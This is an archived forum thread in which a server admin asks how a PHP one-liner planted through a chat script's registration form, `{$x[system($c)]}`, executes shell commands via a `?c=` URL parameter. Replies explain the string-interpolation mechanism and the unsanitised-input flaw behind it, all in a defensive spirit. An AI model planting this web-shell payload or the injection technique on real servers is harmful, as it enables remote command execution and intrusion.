Hello,
our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)
This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):
<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>
save these lines as e.g. /sys.php and call it with your browser: http://localhost/sys.php?c=ls
and you can execute any system command and see the results!
But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
I couldn't find anything about this on the web (didn't know how to
specify the search to get useful results). Can anybody explain what
happens?
Thanks and best regards,
Ingo 8  1491 
Oski wrote:
our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)
This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):
<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>
save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!
But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
If you write
$a = "{$x['key']}";
then $a gets the value $x['key'] as expected.
$a = $x[system($c)];
then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).
It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.
I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.
Tim
Tim Martin wrote:
Oski wrote:
>our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)
This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):
<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>
save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!
But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
If you write
$a = "{$x['key']}";
then $a gets the value $x['key'] as expected.
$a = $x[system($c)];
then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).
It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.
I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.
Following up to myself, I should note that this is not as big an issue
as it seems on the surface - it only matters if the malicious user
writes the string literal itself. If they control a variable that is
substituted into the string literal, it isn't a problem. e.g.
$intermediate = "system($c)"; // Set by malicious user from a form input
// or some other non-string-literal
$a = "{$x[$intermediate]}"; // This code written by you, not under the
// control of the malicious user
is fine.
Tim
In article <11**********************@m79g2000cwm.googlegroups .com>,
"Oski" <os**@gmx.dewrote:
Hello,
our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)
This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):
<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>
save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!
But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
Well, it's odd. system() returns the last line of output if
successful. But in this case, $name is set to the value of $x where
the key is the last line of the ouput. Is there any $x declaration in
the script?
For instance, this:
<?
$x["var"] = "foobar";
$c = "ls";
$name = "{$x[system($c)]}";
print "Value: $name";
?>
Outpus, after a long list of directories in my root directorie (where
'var' is the last):
Value: foobar
So, "var" is the last directory in the ls listing. And the value of
$x["var"] is "foobar", which is assigned to $name.
Why? I have no idea. I'd have top see the entire script for that.
--
Sandman[.net]
our server got hacked through a security hole in an open source php
chat script.
Which one?
Regards,
Talthen
Sandman wrote:
Why? I have no idea. I'd have top see the entire script for that.
There is no more script, no more than what was posted by me! The other
lines (mentioned as ommitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.
Btw, I'll not disclose which script is vulnerable (at least not now).
I consider contacting the authors first - if this thread turns out to
be a real security hole ...
Ingo.
In article <11*********************@m73g2000cwd.googlegroups. com>,
"Oski" <os**@gmx.dewrote:
Sandman wrote:
Why? I have no idea. I'd have top see the entire script for that.
There is no more script, no more than what was posted by me! The other
lines (mentioned as ommitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.
Btw, I'll not disclose which script is vulnerable (at least not now).
I consider contacting the authors first - if this thread turns out to
be a real security hole ...
Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.
I've been "hacked" this was also, so I've seen some of these scripts.
--
Sandman[.net]
Oski wrote:
This chat script allowed the user to create a new php script on our
server, [snip]
Surely this is the security hole rather than the script created.
Allowing anyone to write php code that will run on your server is a
Really Bad Idea (tm).
Robin
Sandman wrote:
Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.
I've been "hacked" this was also, so I've seen some of these scripts.
In this case, the chat script asks for your name and email when
registering.
Then, it creates a php-script (as described in my first post) and
creates lines within it:
$name = "<userinput>";
$email = "<userinput_2";
// and so on ...
So you just have to know where this php script is created/saved and
register with a tampered name and then call this php script with the
desired URL + encoded command strings, like "?c=ls%20-l" etc.
Of course, the real (huuuge!) security hole is creating a php script
with unchecked userinput. (I don't dare to guess what might happen if
you have disabled magic_quotes).
But I could not explain the behaviour of PHP as well, especially as
there is nothing documented about this "feature" to execute code within
a variable assignment.
Ingo This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics
by: Bob Bedford |
last post by:
My database suddently dissapeared from my ISP. I've logged in and the
database doesn't exist anymore.
I don't know anything about website hacking, so my code is possibly open for
hackers.
...
|
by: arkain denial |
last post by:
this site can't be hacked: http://www.bleacheatingfreaks.com/?ref=Goat_Punisher
|
by: Christian Schuhegger |
last post by:
Hi,
I remember that I've seen some time ago (perhaps a year or so) a project
on freshmeat where a guy hacked a postgres c-interface library (i guess
it was libpq / or perhaps he just used the...
|
by: Doc |
last post by:
I keep reading about various websites being hacked into and wonder, how is
this done? Not for any nefarious reasons, but to take measures to protect
mine. Apparently this has been done to some high...
|
by: codefixer |
last post by:
Hello:
The phpBB sites are hacked. If you search for "HACKED BY CYBER-ATTACK"
on msn.com you will get a list of all the sites hacked.
Anyone knows what is the way to clean this up ?
Thanks.
|
by: rerdavies |
last post by:
OS: WIndows Server 2003.
Currently logged in user is running with German(German) regional settings.
Code fragment:
System.Globalization.CultureInfo culture = new...
|
by: David Carter |
last post by:
Hello
I switched my computer on today and found that a new login of "ASP.net" had
been added, it was a full priviledge account.
Can anyone tell me what has happened?
I have no idea what ASP is so...
|
by: vikassaxena |
last post by:
website was hacked on 24 march , the script the browser is gettting from server was normal but still the the browser shows it's being hacked
when after saving the view source i open it on...
|
by: premMS143 |
last post by:
Hi,
I want to ping certain systems IP. Everytime I'm using DOS or Start --> Run mode for pinging different PCs. But its becoming very difficult.
So I planned to develop a VB application to make...
|
by: CloudSolutions |
last post by:
Introduction:
For many beginners and individual users, requiring a credit card and email registration may pose a barrier when starting to use cloud servers. However, some cloud server providers now...
|
by: Faith0G |
last post by:
I am starting a new it consulting business and it's been a while since I setup a new website. Is wordpress still the best web based software for hosting a 5 page website? The webpages will be...
|
by: isladogs |
last post by:
The next Access Europe User Group meeting will be on Wednesday 3 Apr 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome former...
|
by: Charles Arthur |
last post by:
How do i turn on java script on a villaon, callus and itel keypad mobile phone
|
by: aa123db |
last post by:
Variable and constants
Use var or let for variables and const fror constants.
Var foo ='bar';
Let foo ='bar';const baz ='bar';
Functions
function $name$ ($parameters$) {
}
...
|
by: ryjfgjl |
last post by:
In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...
|
by: BarryA |
last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
|
by: nemocccc |
last post by:
hello, everyone, I want to develop a software for my android phone for daily needs, any suggestions?
|
by: Hystou |
last post by:
There are some requirements for setting up RAID:
1. The motherboard and BIOS support RAID configuration.
2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
| |
